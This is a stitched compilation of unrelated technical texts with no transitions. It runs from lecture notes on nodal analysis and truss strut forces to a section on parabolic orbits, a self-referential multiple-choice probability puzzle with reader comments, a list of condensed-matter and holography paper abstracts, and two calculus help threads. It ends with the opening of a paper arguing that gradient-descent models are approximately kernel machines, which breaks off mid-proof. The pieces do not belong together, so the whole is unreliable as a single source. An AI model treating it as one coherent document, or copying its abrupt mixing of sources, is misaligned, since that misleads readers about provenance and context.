## Disclaimer
Peeter’s lecture notes from class. May not be entirely coherent.
## In slides
A review of systematic nodal analysis for a basic resistive circuit was outlined in slides, with a subsequent attempt to show how many similar linear systems can be modeled as circuits so that the same toolbox can be applied. This included blood flow through a body (and blood flow to the brain), a model of antenna interference in a portable phone, heat conduction in a one dimensional conductor under a heat lamp, and a few other systems.
This discussion reminded me of the joke where the farmer, the butcher and the physicist are all invited to talk at a beef convention. After meaningful and appropriate talks by the farmer and the butcher, the physicist gets his chance, and proceeds with “We begin by modeling the cow as a sphere, …”. The ECE equivalent of that appears to be a Kirchhoff circuit problem.
## Mechanical structures example
Continuing the theme of applying the circuit toolbox to other linear systems, let's consider a truss system as illustrated in fig. 1, or the simpler similar system of fig. 2.
fig. 1. A static loaded truss configuration
Our unknowns are
• positions of the joints after deformation $$(x_i, y_i)$$.
• force acting on each strut $$\BF_j = (F_{j,x}, F_{j,y})$$.
The constitutive equations, assuming static conditions (steady state, no transients), are:
• Load force. $$\BF_L = (F_{L, x}, F_{L, y}) = (0, -m g)$$.
• Strut forces. Under static conditions the total resulting force on the strut is zero, so $$\BF'_j = -\BF_j$$. For this problem it is redundant to label forces on both ends, so we mark the labeled end of the object with an asterisk as in fig. 3.
fig. 3. Strut model
### Consider a simple case
One strut as in fig. 4.
fig. 4. Very simple static load
\label{eqn:multiphysicsL1:20}
\BF^\conj = - \Ba_x
\underbrace{
\epsilon
}_{\text{constant, describes the beam elasticity, given}}
\biglr{
\underbrace{
L
}_{\text{loaded length $$L = \Abs{x^\conj - 0}$$}}
- L_0 }
The constitutive law for a general strut as in fig. 5 is
fig. 5. Strut force diagram
The force is directed along the unit vector
\label{eqn:multiphysicsL1:40}
\Be = \frac{\Br^\conj - \Br}{\Abs{\Br^\conj - \Br}},
and has the form
\label{eqn:multiphysicsL1:60}
\BF^\conj = - \Be \epsilon \lr{ L - L_0 }.
The value $$\epsilon$$ may be related to Hooke's constant, and $$L$$ is given by
\label{eqn:multiphysicsL1:80}
L = \Abs{\Br^\conj - \Br} = \sqrt{(x^\conj - x)^2 + (y^\conj - y)^2}.
Observe that the relation between $$\BF^\conj$$ and position is nonlinear!
Treatment of this system will be used as the prototype for our handling of other nonlinear systems.
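As a numeric sanity check of the strut law above, here is a minimal Python sketch; the elasticity $$\epsilon$$, unloaded length $$L_0$$, and joint positions are made-up values, not from the lecture:

```python
import math

def strut_force(r, r_star, eps, L0):
    """Force on the starred end of a strut, F* = -e * eps * (L - L0),
    where e is the unit vector from r to r* and L = |r* - r|."""
    dx = r_star[0] - r[0]
    dy = r_star[1] - r[1]
    L = math.hypot(dx, dy)        # current (loaded) length
    ex, ey = dx / L, dy / L       # unit vector e along the strut
    mag = -eps * (L - L0)         # scalar part of the constitutive law
    return (mag * ex, mag * ey)

# A strut stretched along the x axis: loaded length L = 2, unloaded L0 = 1.5.
Fx, Fy = strut_force((0.0, 0.0), (2.0, 0.0), eps=10.0, L0=1.5)
print(Fx, Fy)   # the stretched strut pulls the starred end back toward the origin
```

Note that doubling the stretch does not simply double the force components for a general geometry, since the unit vector $$\Be$$ also depends on the positions; this is exactly the nonlinearity observed above.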
Returning to the simple static system, and introducing force and joint labels as in fig. 6, we can examine the \textAndIndex{conservation law}, the balance of forces.
fig. 6. Strut system
• At joint 1:\label{eqn:multiphysicsL1:100}
\Bf_A + \Bf_B + \Bf_C = 0
or
\label{eqn:multiphysicsL1:120}
\begin{aligned}
\Bf_{A,x} + \Bf_{B,x} + \Bf_{C,x} &= 0 \\
\Bf_{A,y} + \Bf_{B,y} + \Bf_{C,y} &= 0
\end{aligned}
• At joint 2:\label{eqn:multiphysicsL1:140}
-\Bf_C + \Bf_D + \Bf_L = 0
or
\label{eqn:multiphysicsL1:160}
\begin{aligned}
-\Bf_{C,x} + \Bf_{D,x} + \Bf_{L,x} &= 0 \\
-\Bf_{C,y} + \Bf_{D,y} + \Bf_{L,y} &= 0
\end{aligned}
We have an equivalence
• Force $$\leftrightarrow$$ Current.
• Force balance equation $$\leftrightarrow$$ KCL
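To make the KCL analogy concrete, here is a tiny Python sketch of the circuit-side analogue, nodal analysis of a two-node resistive network; the component values are made up for illustration:

```python
# Nodal analysis: 1 A current source into node 1, R1 = 1 ohm from node 1 to
# ground, R2 = 2 ohm between nodes 1 and 2, R3 = 4 ohm from node 2 to ground.
# KCL at each node gives G v = I with conductance matrix G.
G = [[1/1 + 1/2, -1/2],
     [-1/2, 1/2 + 1/4]]
I = [1.0, 0.0]

# Solve the 2x2 system with Cramer's rule.
det = G[0][0]*G[1][1] - G[0][1]*G[1][0]
v1 = (I[0]*G[1][1] - G[0][1]*I[1]) / det
v2 = (G[0][0]*I[1] - I[0]*G[1][0]) / det
print(v1, v2)

# KCL check at node 2: current in through R2 equals current out through R3,
# just as the strut-force balance sums to zero at each joint.
assert abs((v1 - v2)/2 - v2/4) < 1e-12
```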
# Parabolic trajectory
In astrodynamics or celestial mechanics a parabolic trajectory is an orbit with eccentricity equal to 1. When the body is moving away from the source it is called an escape orbit; otherwise it is a capture orbit.
Under standard assumptions a body traveling along an escape orbit will coast to infinity, with velocity relative to the central body tending to zero, and therefore will never return. A parabolic trajectory is the minimum-energy escape trajectory.
## Velocity
Under standard assumptions the orbital velocity ($v$) of a body traveling along a parabolic trajectory can be computed as:
$v = \sqrt{\frac{2\mu}{r}}$
where:
• $r$ is the radial distance of the orbiting body from the central body,
• $\mu$ is the standard gravitational parameter.
At any position the orbiting body has the escape velocity for that position.
Having escape velocity with respect to the Earth is not enough to escape the Solar System: near the Earth the orbit resembles a parabola, but farther away it bends into an elliptical orbit around the Sun.
This velocity ($v$) is closely related to the orbital velocity of a body in a circular orbit with radius equal to the radial position of the orbiting body on the parabolic trajectory:
$v = \sqrt{2} \cdot v_O$
where:
• $v_O$ is the orbital velocity of a body in a circular orbit.
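Both relations can be checked numerically. The sketch below uses Earth's standard gravitational parameter and a radius near Earth's surface (the values are approximate):

```python
import math

mu_earth = 3.986004418e14   # standard gravitational parameter of Earth, m^3/s^2
r = 6.371e6                 # radial distance, roughly Earth's mean radius, m

v_escape = math.sqrt(2 * mu_earth / r)   # parabolic (escape) speed
v_circular = math.sqrt(mu_earth / r)     # circular-orbit speed at the same r

print(v_escape)                          # about 11.2 km/s at Earth's surface
print(math.isclose(v_escape, math.sqrt(2) * v_circular))   # v = sqrt(2) * v_O
```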
## Equation of motion
Under standard assumptions, for a body moving along this kind of trajectory the orbital equation becomes:
$r = \frac{h^2}{\mu} \frac{1}{1 + \cos\theta}$
where:
• $r$ is the radial distance of the orbiting body from the central body,
• $h$ is the specific angular momentum of the orbiting body,
• $\theta$ is the true anomaly of the orbiting body,
• $\mu$ is the standard gravitational parameter.
## Energy
Under standard assumptions, the specific orbital energy ($\epsilon$) of a parabolic trajectory is zero, so the orbital energy conservation equation for this trajectory takes the form:
$\epsilon = \frac{v^2}{2} - \frac{\mu}{r} = 0$
where:
• $v$ is the orbital velocity of the orbiting body,
• $r$ is the radial distance of the orbiting body from the central body,
• $\mu$ is the standard gravitational parameter.
# What are the chances?
If you choose the answer to this question at random, what is the probability that it will be correct?
a) $$25$$ %
b) $$50$$ %
c) $$0$$ %
d) $$25$$ %
Good Luck. :)
Note by Muzaffar Ahmed
3 years, 1 month ago
25% · 2 years, 9 months ago
25 % . Because there are four options each contributing 25 % · 3 years, 1 month ago
Not so simple, man, not so simple · 3 years, 1 month ago
pray tell us the answer!!!!!!!!! · 3 years, 1 month ago
I guess these sort of questions are good for discussions rather for finding answers. For any answer there is a contradictory statement ......:) how about considering both 25% into single unit and the remaining 0 and 50 we get one more combination 1/3*100 · 3 years, 1 month ago
They are not one unit.. They are different options and the question is about choosing one option randomly... · 3 years, 1 month ago
50% · 3 years, 1 month ago
Why 50% ? · 3 years, 1 month ago
25% · 3 years, 1 month ago
Why 25% ? · 3 years, 1 month ago
50% · 3 years, 1 month ago
0% is the correct answer .............. if it would have been 25% then if we chose randomly, there are 2 choices out of a total of four , that seem optimal ( i.e. option(a and (d ) so that would mean that the probability would be equal to 50 % ........ Contradictory! if it would have been 50% , then it would have meant that only one choice out of the four is correct i.e. 25%... this answer is also contradictory to itself.......... if it would have been 0% then again it would imply that one choice out of the four is correct i.e. 25% ...... hence it seems that none of the option is correct ......... that leads us to the answer 0% , and hence this answer is not in contrary to itself!!!!!!! · 3 years, 1 month ago
If 0% is correct, then it is one of the four options, which would give you 25% probability again. · 3 years, 1 month ago
Agree. Can't be zero percent. If one of the options is correct and the user selects it randomly it definitely will have a probability. I will still stick to 25%, because among 4 options only one is correct and the probability for that becomes 25% (1/4 multiplied by 100) · 3 years, 1 month ago
There are 2 instances of the option 25%, so if 25% is correct, you will have $$\frac{2}{4} \times 100 = 50$$ % probability. · 3 years, 1 month ago
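A quick Python sketch makes the contradiction explicit; it just counts how often a uniformly random pick matches each candidate answer:

```python
options = [25, 50, 0, 25]   # the four printed answers, in percent

def chance_of_picking(value):
    """Probability (in %) that a uniform random pick equals `value`."""
    return 100 * options.count(value) / len(options)

# An answer is self-consistent only if picking it is exactly as likely
# as the percentage it claims.
for candidate in sorted(set(options)):
    print(candidate, chance_of_picking(candidate))
# 25 is picked with 50% chance, while 50 and 0 are each picked with 25%:
# every option contradicts its own claim.
```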
• ### Cycle-expansion method for the Lyapunov exponent, susceptibility, and higher moments(1707.00708)
Sept. 20, 2017 cond-mat.stat-mech
Lyapunov exponents characterize the chaotic nature of dynamical systems by quantifying the growth rate of uncertainty associated with the imperfect measurement of initial conditions. Finite-time estimates of the exponent, however, experience fluctuations due to both the initial condition and the stochastic nature of the dynamical path. The scale of these fluctuations is governed by the Lyapunov susceptibility, the finiteness of which typically provides a sufficient condition for the law of large numbers to apply. Here, we obtain a formally exact expression for this susceptibility in terms of the Ruelle dynamical zeta function for one-dimensional systems. We further show that, for systems governed by sequences of random matrices, the cycle expansion of the zeta function enables systematic computations of the Lyapunov susceptibility and of its higher-moment generalizations. The method is here applied to a class of dynamical models that maps to static disordered spin chains with interactions stretching over a varying distance, and is tested against Monte Carlo simulations.
• ### Optimizing collective fieldtaxis of swarming agents through reinforcement learning(1709.02379)
Swarming of animal groups enthralls scientists in fields ranging from biology to physics to engineering. Complex swarming patterns often arise from simple interactions between individuals to the benefit of the collective whole. The existence and success of swarming, however, nontrivially depend on microscopic parameters governing the interactions. Here we show that a machine-learning technique can be employed to tune these underlying parameters and optimize the resulting performance. As a concrete example, we take an active matter model inspired by schools of golden shiners, which collectively conduct phototaxis. The problem of optimizing the phototaxis capability is then mapped to that of maximizing benefits in a continuum-armed bandit game. The latter problem accepts a simple reinforcement-learning algorithm, which can tune the continuous parameters of the model. This result suggests the utility of machine-learning methodology in swarm-robotics applications.
• ### Breaking the glass ceiling: Configurational entropy measurements in extremely supercooled liquids(1704.08257)
Liquids relax extremely slowly on approaching the glass state. One explanation is that an entropy crisis, due to the rarefaction of available states, makes it increasingly arduous to reach equilibrium in that regime. Validating this scenario is challenging, because experiments offer limited resolution, while numerical studies lag more than eight orders of magnitude behind experimentally-relevant timescales. In this work we not only close the colossal gap between experiments and simulations but manage to create in-silico configurations that have no experimental analog yet. Deploying a range of computational tools, we obtain four estimates of their configurational entropy. These measurements consistently confirm that the steep entropy decrease observed in experiments is found also in simulations even beyond the experimental glass transition. Our numerical results thus open a new observational window into the physics of glasses and reinforce the relevance of an entropy crisis for understanding their formation.
• ### Nontrivial critical fixed point for replica-symmetry-breaking transitions(1607.04217)
The transformation of the free-energy landscape from smooth to hierarchical is one of the richest features of mean-field disordered systems. A well-studied example is the de Almeida-Thouless transition for spin glasses in a magnetic field, and a similar phenomenon--the Gardner transition--has recently been predicted for structural glasses. The existence of these replica-symmetry-breaking phase transitions has, however, long been questioned below their upper critical dimension, d_u=6. Here, we obtain evidence for the existence of these transitions in d<d_u using a two-loop calculation. Because the critical fixed point is found in the strong-coupling regime, we corroborate the result by resumming the perturbative series with inputs from a three-loop calculation and an analysis of its large-order behavior. Our study offers a resolution of the long-lasting controversy surrounding phase transitions in finite-dimensional disordered systems.
• ### Point-to-set lengths, local structure, and glassiness(1511.03573)
The growing sluggishness of glass-forming liquids is thought to be accompanied by growing structural order. The nature of such order, however, remains hotly debated. A decade ago, point-to-set (PTS) correlation lengths were proposed as measures of amorphous order in glass formers, but recent results raise doubts as to their generality. Here, we extend the definition of PTS correlations to agnostically capture any type of growing order in liquids, be it local or amorphous. This advance enables the formulation of a clear distinction between slowing down due to conventional critical ordering and that due to glassiness, and provides a unified framework to assess the relative importance of specific local order and generic amorphous order in glass formation.
• ### Linking dynamical heterogeneity to static amorphous order(1309.5085)
Aug. 19, 2016 cond-mat.dis-nn
Glass-forming liquids grow dramatically sluggish upon cooling. This slowdown has long been thought to be accompanied by a growing correlation length. Characteristic dynamical and static length scales, however, have been observed to grow at different rates, which perplexes the relationship between the two and with the slowdown. Here, we show the existence of a direct link between dynamical sluggishness and static point-to-set correlations, holding at the local level as we probe different environments within a liquid. This link, which is stronger and more general than that observed with locally preferred structures, suggests the existence of an intimate relationship between structure and dynamics in a broader range of glass-forming liquids than previously thought.
• ### Efficient measurement of point-to-set correlations and overlap fluctuations in glass-forming liquids(1510.06320)
Cavity point-to-set correlations are real-space tools to detect the roughening of the free-energy landscape that accompanies the dynamical slowdown of glass-forming liquids. Measuring these correlations in model glass formers remains, however, a major computational challenge. Here, we develop a general parallel-tempering method that provides orders-of-magnitude improvement for sampling and equilibrating configurations within cavities. We apply this improved scheme to the canonical Kob-Andersen binary Lennard-Jones model for temperatures down to the mode-coupling theory crossover. Most significant improvements are noted for small cavities, which have thus far been the most difficult to study. This methodological advance also enables us to study a broader range of physical observables associated with thermodynamic fluctuations. We measure the probability distribution of overlap fluctuations in cavities, which displays a non-trivial temperature evolution. The corresponding overlap susceptibility is found to provide a robust quantitative estimate of the point-to-set length scale requiring no fitting. By resolving spatial fluctuations of the overlap in the cavity, we also obtain quantitative information about the geometry of overlap fluctuations. We can thus examine in detail how the penetration length as well as its fluctuations evolve with temperature and cavity size.
• ### Glassy slowdown and replica-symmetry-breaking instantons(1406.1498)
Glass-forming liquids exhibit a dramatic dynamical slowdown as the temperature is lowered. This can be attributed to relaxation proceeding via large structural rearrangements whose characteristic size increases as the system cools. These cooperative rearrangements are well modeled by instantons in a replica effective field theory, with the size of the dominant instanton encoding the liquid's cavity point-to-set correlation length. Varying the parameters of the effective theory corresponds to varying the statistics of the underlying free-energy landscape. We demonstrate that, for a wide range of parameters, replica-symmetry-breaking instantons dominate. The detailed structure of the dominant instanton provides a rich window into point-to-set correlations and glassy dynamics.
• ### Critical Exponents for Supercooled Liquids(1302.2917)
We compute critical exponents governing universal features of supercooled liquids through the effective theory of an overlap field. The correlation length diverges with the Ising exponent; the size of dynamically heterogeneous patches grows more rapidly; and the relaxation time obeys a generalized Vogel-Fulcher-Tammann relation.
• ### Effective Field Theory for Supercooled Liquids(1212.0857)
Starting from a microscopic model of liquids, we construct an effective theory of an overlap field through duplication of the system and coarse-graining. We then propose a recipe to extract a relaxation time and two characteristic length scales of a supercooled liquid from this effective field theory. Appealing to the Ginzburg-Landau-Wilson paradigm near the putative critical point, we further conclude that this effective field theory resides within the Ising universality class.
• ### Point-to-set correlations and instantons(1311.7142)
For a generic many-body system, we define a soft point-to-set correlation function. We then show that this function accepts a representation in terms of an effective overlap field theory. In particular, instantons in this effective field theory encode point-to-set correlations for supercooled liquids.
• ### Lifshitz Tails of Scale-Invariant Theories with Electric Impurities(1207.3353)
We study scale-invariant systems in the presence of Gaussian quenched electric disorder, focusing on the tails of the energy spectra induced by disorder. For relevant disorder we derive asymptotic expressions for the densities of unit-charged states in the tails, positing the existence of saddle points in appropriate disorder integrals. The resultant scalings are dictated by spatial dimensions and dynamical exponents of the systems.
• ### Instanton Calculus of Lifshitz Tails(1205.0005)
April 30, 2012 hep-th, cond-mat.dis-nn
For noninteracting particles moving in a Gaussian random potential, there exists a disagreement in the literature on the asymptotic expression for the density of states in the tail of the band. We resolve this discrepancy. Further we illuminate the physical facet of instantons appearing in replica and supersymmetric derivations with another derivation employing a Lagrange multiplier field.
• ### Disordered Holographic Systems II: Marginal Relevance of Imperfection(1201.6366)
Jan. 30, 2012 hep-th, cond-mat.str-el
We continue our study of quenched disorder in holographic systems, focusing on the effects of mild electric disorder. By studying the renormalization group evolution of the disorder distribution at subleading order in perturbations away from the clean fixed point, we show that electric disorder is marginally relevant in (2+1)-dimensional holographic conformal field theories.
• ### Disordered Holographic Systems I: Functional Renormalization(1102.2892)
Feb. 14, 2011 hep-th, cond-mat.str-el
We study quenched disorder in strongly correlated systems via holography, focusing on the thermodynamic effects of mild electric disorder. Disorder is introduced through a random potential which is assumed to self-average on macroscopic scales. Studying the flow of this distribution with energy scale leads us to develop a holographic functional renormalization scheme. We test this scheme by computing thermodynamic quantities and confirming that the Harris criterion for relevance, irrelevance or marginality of quenched disorder holds.
• ### Adventures in Holographic Dimer Models(1009.3268)
Jan. 10, 2011 hep-th, cond-mat.str-el
We abstract the essential features of holographic dimer models, and develop several new applications of these models. First, semi-holographically coupling free band fermions to holographic dimers, we uncover novel phase transitions between conventional Fermi liquids and non-Fermi liquids, accompanied by a change in the structure of the Fermi surface. Second, we make dimer vibrations propagate through the whole crystal by way of double trace deformations, obtaining nontrivial band structure. In a simple toy model, the topology of the band structure experiences an interesting reorganization as we vary the strength of the double trace deformations. Finally, we develop tools that would allow one to build, in a bottom-up fashion, a holographic avatar of the Hubbard model.
• ### Holographic Lattices, Dimers, and Glasses(0909.2639)
Jan. 27, 2010 hep-th, cond-mat.str-el
We holographically engineer a periodic lattice of localized fermionic impurities within a plasma medium by putting an array of probe D5-branes in the background produced by N D3-branes. Thermodynamic quantities are computed in the large N limit via the holographic dictionary. We then dope the lattice by replacing some of the D5-branes by anti-D5-branes. In the large N limit, we determine the critical temperature below which the system dimerizes with bond ordering. Finally, we argue that for the special case of a square lattice our system is glassy at large but finite N, with the low temperature physics dominated by a huge collection of metastable dimerized configurations without long-range order, connected only through tunneling events.
• ### Landscape versus Swampland for Higher Derivative Gravity(0902.1770)
Feb. 10, 2009 hep-th
We survey recent studies of Gauss-Bonnet gravity and its dual conformal field theories, including their relation to the violation of the Kovtun-Starinets-Son viscosity bound. Via holography, we can also study properties such as microcausality and unitarity of boundary field theory duals. Such studies in turn supply constraints on bulk gravitational theories, consigning some of them to the swampland.
• ### Viscosity Bound Violation in Higher Derivative Gravity(0712.0805)
June 13, 2008 hep-th, hep-ph, gr-qc
Motivated by the vast string landscape, we consider the shear viscosity to entropy density ratio in conformal field theories dual to Einstein gravity with curvature square corrections. After field redefinitions these theories reduce to Gauss-Bonnet gravity, which has special properties that allow us to compute the shear viscosity nonperturbatively in the Gauss-Bonnet coupling. By tuning of the coupling, the value of the shear viscosity to entropy density ratio can be adjusted to any positive value from infinity down to zero, thus violating the conjectured viscosity bound. At linear order in the coupling, we also check consistency of four different methods to calculate the shear viscosity, and we find that all of them agree. We search for possible pathologies associated with this class of theories violating the viscosity bound.
• ### Viscosity Bound and Causality Violation(0802.3318)
May 22, 2008 hep-th, hep-ph, gr-qc
In recent work we showed that, for a class of conformal field theories (CFT) with Gauss-Bonnet gravity dual, the shear viscosity to entropy density ratio, $\eta/s$, could violate the conjectured Kovtun-Starinets-Son viscosity bound, $\eta/s\geq1/4\pi$. In this paper we argue, in the context of the same model, that tuning $\eta/s$ below $(16/25)(1/4\pi)$ induces microcausality violation in the CFT, rendering the theory inconsistent. This is a concrete example in which inconsistency of a theory and a lower bound on viscosity are correlated, supporting the idea of a possible universal lower bound on $\eta/s$ for all consistent theories.
• ### Energy Conditions and Junction Conditions(gr-qc/0505048)
Aug. 22, 2005 astro-ph, hep-th, gr-qc
We consider the familiar junction conditions described by Israel for thin timelike walls in Einstein-Hilbert gravity. One such condition requires the induced metric to be continuous across the wall. Now, there are many spacetimes with sources confined to a thin wall for which this condition is violated and the Israel formalism does not apply. However, we explore the conjecture that the induced metric is in fact continuous for any thin wall which models spacetimes containing only positive energy matter. Thus, the usual junction conditions would hold for all positive energy spacetimes. This conjecture is proven in various special cases, including the case of static spacetimes with spherical or planar symmetry as well as settings without symmetry which may be sufficiently well approximated by smooth spacetimes with well-behaved null geodesic congruences.
Math Help - Derivative of abs(x) at x=0
1. Derivative of abs(x) at x=0
Can somebody explain why the derivative of abs(x) at x=0 does not exist?
Thanks
2. Re: Derivative of abs(x) at x=0
Hey mcleja.
Hint: Look at the derivative from the right hand side and the left hand sides and show that they aren't equal.
3. Re: Derivative of abs(x) at x=0
Ahhhh ok, thanks chiro.
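Here's a quick numeric illustration of chiro's hint in Python (the step size h is arbitrary):

```python
def one_sided_slopes(f, x0, h=1e-8):
    """Forward and backward difference quotients of f at x0."""
    right = (f(x0 + h) - f(x0)) / h
    left = (f(x0) - f(x0 - h)) / h
    return left, right

left, right = one_sided_slopes(abs, 0.0)
print(left, right)   # -1.0 1.0: the one-sided limits disagree, so f'(0) does not exist
```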
# Homework Help: Natural log of a sum? (not sum of natural logs)
1. Oct 25, 2012
### yiyopr
1. The problem statement, all variables and given/known data
Find the derivative of y = x^2 + x^(2x)
3. The attempt at a solution
By looking at the equation I think I need to use implicit differentiation + natural logs. But I can't do anything with:
ln y = ln(x^2 + x^(2x))
So I assume I'm wrong.. Any help??
2. Oct 25, 2012
### gabbagabbahey
Use the linearity of the derivative operator: $\frac{dy}{dx} = \frac{d}{dx}\left(x^2+x^{2x} \right) = \frac{d}{dx}\left(x^2 \right) + \frac{d}{dx}\left(x^{2x} \right)$. Compute each derivative separately and then add the results.
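Following this hint, the $x^{2x}$ term can be handled on its own by writing it as $e^{2x \ln x}$ (logarithmic differentiation applied to that term alone), giving $\frac{d}{dx} x^{2x} = x^{2x}(2\ln x + 2)$. A numeric sanity check in Python, with a made-up test point:

```python
import math

def y(x):
    return x**2 + x**(2*x)

def dy_analytic(x):
    # d/dx x^2 = 2x; d/dx x^(2x) = x^(2x) * (2*ln(x) + 2), since x^(2x) = exp(2x ln x).
    return 2*x + x**(2*x) * (2*math.log(x) + 2)

x0 = 1.7
h = 1e-6
numeric = (y(x0 + h) - y(x0 - h)) / (2*h)   # central difference approximation
print(abs(numeric - dy_analytic(x0)) < 1e-4)  # True: the formulas agree
```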
Every Model Learned by Gradient Descent Is Approximately a Kernel Machine
Abstract
Deep learning’s successes are often attributed to its ability to automatically discover new representations of the data, rather than relying on handcrafted features like other learning methods. We show, however, that deep networks learned by the standard gradient descent algorithm are in fact mathematically approximately equivalent to kernel machines, a learning method that simply memorizes the data and uses it directly for prediction via a similarity function (the kernel). This greatly enhances the interpretability of deep network weights, by elucidating that they are effectively a superposition of the training examples. The network architecture incorporates knowledge of the target function into the kernel. This improved understanding should lead to better learning algorithms.
Keywords: gradient descent, kernel machines, deep learning, representation learning, neural tangent kernel
1 Introduction
Despite its many successes, deep learning remains poorly understood (Goodfellow et al., 2016). In contrast, kernel machines are based on a well-developed mathematical theory, but their empirical performance generally lags behind that of deep networks (Schölkopf and Smola, 2002). The standard algorithm for learning deep networks, and many other models, is gradient descent (Rumelhart et al., 1986). Here we show that every model learned by this method, regardless of architecture, is approximately equivalent to a kernel machine with a particular type of kernel. This kernel measures the similarity of the model at two data points in the neighborhood of the path taken by the model parameters during learning. Kernel machines store a subset of the training data points and match them to the query using the kernel. Deep network weights can thus be seen as a superposition of the training data points in the kernel’s feature space, enabling their efficient storage and matching. This contrasts with the standard view of deep learning as a method for discovering representations from data, with the attendant lack of interpretability (Bengio et al., 2013). Our result also has significant implications for boosting algorithms (Freund and Schapire, 1997), probabilistic graphical models (Koller and Friedman, 2009), and convex optimization (Boyd and Vandenberghe, 2004).
2 Path Kernels
A kernel machine is a model of the form
$$y = g\left(\sum_i a_i K(x, x_i) + b\right),$$
where $x$ is the query data point, the sum is over training data points $x_i$, $g$ is an optional nonlinearity, the $a_i$'s and $b$ are learned parameters, and the kernel $K$ measures the similarity of its arguments (Schölkopf and Smola, 2002). In supervised learning, $a_i$ is typically a linear function of $y^*_i$, the known output for $x_i$. Kernels may be predefined or learned (Cortes et al., 2009). Kernel machines, also known as support vector machines, are one of the most developed and widely used machine learning methods. In the last decade, however, they have been eclipsed by deep networks, also known as neural networks and multilayer perceptrons, which are composed of multiple layers of nonlinear functions. Kernel machines can be viewed as neural networks with one hidden layer, with the kernel as the nonlinearity. For example, a Gaussian kernel machine is a radial basis function network (Poggio and Girosi, 1990). But a deep network would seem to be irreducible to a kernel machine, since it can represent some functions exponentially more compactly than a shallow one (Delalleau and Bengio, 2011; Cohen et al., 2016).
Whether a representable function is actually learned, however, depends on the learning algorithm. Most deep networks, and indeed most machine learning models, are trained using variants of gradient descent (Rumelhart et al., 1986). Given an initial parameter vector $w_0$ and a loss function $L$, gradient descent repeatedly modifies the model's parameters by subtracting the loss's gradient from them, scaled by the learning rate $\epsilon$:
$$w_{s+1} = w_s - \epsilon \nabla_w L(w_s).$$
The process terminates when the gradient is zero and the loss is therefore at an optimum (or saddle point). Remarkably, we have found that learning by gradient descent is a strong enough constraint that the end result is guaranteed to be approximately a kernel machine, regardless of the number of layers or other architectural features of the model.
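The update rule above can be sketched in a few lines of Python; the one-parameter quadratic loss is a made-up example, purely illustrative:

```python
def gradient_descent(grad, w0, eps=0.1, steps=100):
    """Repeatedly subtract the loss gradient, scaled by the learning rate eps."""
    w = w0
    for _ in range(steps):
        w = w - eps * grad(w)
    return w

# Minimize L(w) = (w - 3)^2, whose gradient is 2*(w - 3); the optimum is w = 3.
w_final = gradient_descent(lambda w: 2*(w - 3.0), w0=0.0)
print(w_final)   # converges toward 3.0
```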
Specifically, the kernel machines that result from gradient descent use what we term a path kernel. If we take the learning rate to be infinitesimally small, the path kernel between two data points $x$ and $x'$ is simply the integral of the dot product of the model's gradients at the two points over the path taken by the parameters during gradient descent:
$$K(x, x') = \int_{c(t)} \nabla_w y(x) \cdot \nabla_w y(x')\, dt,$$
where $c(t)$ is the path. Intuitively, the path kernel measures how similarly the model at the two data points varies during learning. The more similar the variation for $x$ and $x_i$, the higher the weight of $x_i$ in predicting $y$. Fig. 1 illustrates this graphically.
Our result builds on the concept of neural tangent kernel, recently introduced to analyze the behavior of deep networks (Jacot et al., 2018). The neural tangent kernel is the integrand of the path kernel when the model is a multilayer perceptron. Because of this, and since a sum of positive definite kernels is also a positive definite kernel (Schölkopf and Smola, 2002), the known conditions for positive definiteness of neural tangent kernels extend to path kernels (Jacot et al., 2018). A positive definite kernel is equivalent to a dot product in a derived feature space, which greatly simplifies its analysis (Schölkopf and Smola, 2002).
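To make the path kernel concrete, here is a hypothetical discrete-time sketch in Python: the integral is approximated by a sum over gradient descent steps of length $\epsilon$, for a toy model $y = w_1 x + w_2 x^2$ trained with squared loss on made-up data (the names and values are illustrative, not from the paper):

```python
def model(w, x):
    return w[0]*x + w[1]*x*x

def grad_w(w, x):
    # Gradient of the model output w.r.t. the weights; for this
    # linear-in-w model it happens to be independent of w.
    return [x, x*x]

def path_kernel(x, xp, data, w=(0.0, 0.0), eps=0.01, steps=200):
    """Approximate K(x, x') = integral along the path of grad_w y(x) . grad_w y(x')."""
    w = list(w)
    K = 0.0
    for _ in range(steps):
        g1, g2 = grad_w(w, x), grad_w(w, xp)
        K += eps * (g1[0]*g2[0] + g1[1]*g2[1])   # dot product, times dt = eps
        # One squared-loss gradient descent step on the training data.
        dw = [0.0, 0.0]
        for xi, yi in data:
            err = model(w, xi) - yi
            gi = grad_w(w, xi)
            dw[0] += 2*err*gi[0]
            dw[1] += 2*err*gi[1]
        w[0] -= eps*dw[0]
        w[1] -= eps*dw[1]
    return K

data = [(1.0, 1.0), (2.0, 0.5)]
print(path_kernel(1.0, 2.0, data) > 0)   # inputs that vary together get positive weight
```

Because this toy model is linear in its weights, the tangent kernel is constant along the path, mirroring the constancy of the neural tangent kernel in the infinite-width limit.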
We now present our main result. For simplicity, in the derivations below we assume that $y$ is a (real-valued) scalar, but it can be made a vector with only minor changes. The data points can be arbitrary structures.
{definition}
The tangent kernel associated with function $f_w(x)$ and parameter vector $v$ is
$K^g_{f,v}(x, x') = \nabla_w f_w(x) \cdot \nabla_w f_w(x')$, with the gradients taken at $v$.
{definition}
The path kernel associated with function $f_w(x)$ and curve $c(t)$ in parameter space is
$K^p_{f,c}(x, x') = \int_{c(t)} K^g_{f,w(t)}(x, x')\, dt$.
{theorem}
Suppose the model is $y = f_w(x)$, with $f$ a differentiable function of the parameters $w$, learned from a training set $\{(x_i, y^*_i)\}_{i=1}^{m}$ by gradient descent with differentiable loss function $L$ and learning rate $\epsilon$. Then
$$\lim_{\epsilon \to 0} y = \sum_{i=1}^{m} a_i K(x, x_i) + b,$$
where $K$ is the path kernel associated with $f_w(x)$ and the path taken by the parameters during gradient descent, $a_i$ is the average loss derivative along the path, weighted by the corresponding tangent kernel, and $b$ is the initial model.
{proof}
In the limit, the gradient descent equation $w_{s+1} = w_s - \epsilon \nabla_w L(w_s)$, which can also be written as
$$\frac{w_{s+1} - w_s}{\epsilon} = -\nabla_w L(w_s),$$
where $L$ is the loss function, becomes the differential equation
$$\frac{dw(t)}{dt} = -\nabla_w L(w(t)).$$
(This is known as a gradient flow (Ambrosio et al., 2008).) Then for any differentiable function $y$ of the weights $w$,
$$\frac{dy}{dt} = \sum_{j=1}^{d} \frac{\partial y}{\partial w_j} \frac{dw_j}{dt},$$
where $d$ is the number of parameters. Replacing $dw_j/dt$ by its gradient descent expression:
$$\frac{dy}{dt} = \sum_{j=1}^{d} \frac{\partial y}{\partial w_j} \left(-\frac{\partial L}{\partial w_j}\right).$$
Applying the additivity of the loss and the chain rule of differentiation:
